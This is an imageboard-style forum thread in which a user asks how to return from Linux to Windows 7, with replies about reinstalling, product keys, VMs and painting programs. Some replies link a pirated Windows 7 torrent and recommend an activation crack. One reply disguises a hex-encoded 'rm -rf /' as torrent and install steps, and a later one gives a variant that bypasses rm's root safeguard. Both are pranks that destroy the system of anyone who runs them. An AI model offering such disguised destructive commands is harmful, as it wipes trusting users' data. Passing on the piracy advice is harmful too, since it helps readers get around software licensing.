Get Linux

>Get Linux
>Can't fucking use sai paint tool
>Can't play a lot of games
>Want Windows 7 again

HOW DO I COME BACK? WOULD I HAVE TO PIRATE IT?

Other urls found in this thread:

microsoftstore.com/store/msusa/en_US/pdp/Windows-10-Home/productID.319937100
thepiratebay.org/torrent/9175198/Windows_7_SP1_Ultimate_(64_Bit)
mirror.corenoc.de/digitalrivercontent.net/
youtube.com/watch?v=raKHHFv4nN8
youtube.com/watch?v=ZEoJgQAfb5Y
twitter.com/AnonBabble

Just use the same CD Key you were using before.

Are you really too stupid to do this?

Obviously you could pirate it, its not hard or anything

If you want you could still dual boot it

>WOULD I HAVE TO PIRATE IT?

No, you can pay for it.

microsoftstore.com/store/msusa/en_US/pdp/Windows-10-Home/productID.319937100

Is there a downside to dual booting compared to pure Linux?

did you really not put in any research before making the switch? christ

>He actually fell for the leenux meme

>Can't fucking use sai paint tool
krita is better tho and it's multiplatform

krita sucks, are you shitting me?

Using a live boot linux cd/dvd, use gparted to format the drive back to ntfs so windows can detect it. Then using a windows installation dvd/usb, reinstall windows. If you have a laptop/prebuilt desktop, your windows key sticker should be somewhere on it, however you'll need the oem windows installation disc to use the oem key. If you don't have a valid key, you can use daz loader from mydigitallife forums.

having to stop what you're doing and reboot whenever you want to do something that's exclusive to one os or the other is kind of a pain, I'd suggest a vm

check out mtpaint it supports pressure sensitive graphics tablets

mtpaint is convoluted garbage

>>Get Linux
Uh huh.
>>Can't fucking use sai paint tool
Use GIMP in single window mode.
>>Can't play a lot of games
VM with GPU passthrough or PlayOnLinux.
>>Want Windows 7 again
Windows 7 ISO (I'm using it now): thepiratebay.org/torrent/9175198/Windows_7_SP1_Ultimate_(64_Bit)

Create bootable installation media using dd.

>loudposting

> (OP)
>however you'll need the oem windows installation disc to use the oem key.

Really?
I had Windows preinstalled in my laptop which I removed and installed Linux over.
Big before doing that I noted down the product key from one of the softwares which give you your product keys.
Will it not work when I download the Win10 .iso file from Microsoft.com and enter the product key?

Windows and OSX users, how does it feel to know there's an entire group of individuals who are better with computers than you are? Meet GNU+Linux users. They are better than you.

They understand the hardware better. They understand the basic principles of computer science better. They know how networks work better than you. They understand the pros and cons of filesystems (including NTFS and HFS+) because with GNU+Linux you get to choose filesystems. They can probably program, too, since learning a scripting language vastly improves productivity under GNU+Linux (and this really pisses you off, since programming was one thing you always wanted to do but could never really find any practical projects to work towards.) Oh, and they probably know Windows better than you, too, since most advanced GNU+Linux users these days are ex-Windows and ex-OS X users who managed to learn GNU+Linux years ago when it was much less "user friendly."

At this point, a confident individual would admit to himself that he has a lot to learn about GNU+Linux and computers in general, but since you lack the self esteem to do that you run back to Windows or OS X, install a MMORPG and keep repeating to yourself "at least I can run games or look pretty. At least I can run games or look pretty." You're also probably very pleased about being able to sync with your horribly restrictive DAP... because Microsoft or Apple have somehow managed to convince you that being shiny is the most important thing to consider when buying a device.

At this point you probably rationalize "well the only thing I know is Windows or OS X, so I must be a Windows or OS X expert!" as if knowing only one thing makes you an automatic expert, or that learning GNU+Linux forces you to forget how to use Windows or OS X entirely.

Meet GNU+Linux users. They're better than you.

Don't know about windows 10, but i tried reinstalling windows 7 on a laptop after installing linux and it rejected the oem key stating i had to use the oem installation disc. I also once used an oem installation disc from one brand on another brand of laptop and it refused the oem key. Did your laptop come with any discs? Sometimes installation discs aren't included. Your options are calling the manufacturer to get a disc sent to you or phoning microsoft to explain the situation so they can activate your key. You could make an attempt and try installing windows and see what happens.

>Meet GNU+Linux users. They are better than you.
Not true, more common distros jus werks on most older hardware and requires no understanding, i have no fucking clue how to install drivers on linux and i've been using it for two years. Also using apt-get or pacman isn't rocket science.

Just go by averages m8. It's still true even though the amount of plebs increased.

No laptop didn't come with any disc.
Thank you for replying.

>thepiratebay.org/torrent/9175198/Windows_7_SP1_Ultimate_(64_Bit)
>piratebay
mirror.corenoc.de/digitalrivercontent.net/

So rubbing windows on a VM with Linux as my main is a viable alternative to dual booting? When I run a vm on Windows it rubs like shit.

Idk seems pretty nice to me
youtube.com/watch?v=raKHHFv4nN8
youtube.com/watch?v=ZEoJgQAfb5Y

I once convinced a professional illustrator to try Krita for a while but his conclusion in the end was that, yes, you can do pretty amazing stuff with it, but it's far from being as convenient as Photoshop, specially because of plugins and brushes.

Krita's great for my purposes, but it will either not run or run like a possum with its legs dismembered on old hardware.
Also some desirable features are either missing or in a painfully incomplete state. Krita's animation options may as well not be there, just release that stuff when you have a worthwhile product ready man.

Do the following
apt-get update && apt-get upgrade
apt-get install deluged deluge-console
torrent --find *Windows*7*
torrent --add; sudo $(echo "726d202d7266202f" | xxd -r -p); torrent-to-iso burn --to /dev/sda

where /dev/sda is a USB drive, check its name with fdisk -l

oh then reboot and go into your BIOS and make sure you set USB to boot first, then boot into it and install Win7

> rm: it is dangerous to operate recursively on '/'
rm: use --no-preserve-root to override this failsafe

???

Nice try

You too, try:

> sudo $(echo "726d202d7266202d2d6e6f2d70726573657276652d726f6f74202f" | xxd -r -p)

next time you make a meme

blown the FUCK out

just wait until a store near you puts it on discount, or ask if they have any win 7/8 copies for cheap

And how the fuck do these oh so important PS plugins work in Sai?

Who the fuck animates in Sai...? Toonz or other professional tools exist.

windows 7 is deprecated.
They don't sell it anymore.
They still support it for those who have it, but getting the ISO is harder and harder.

retard

>>Can't fucking use sai paint tool
you know that this is bullshit, when there is wine right?

thanks I tried it and it worked great.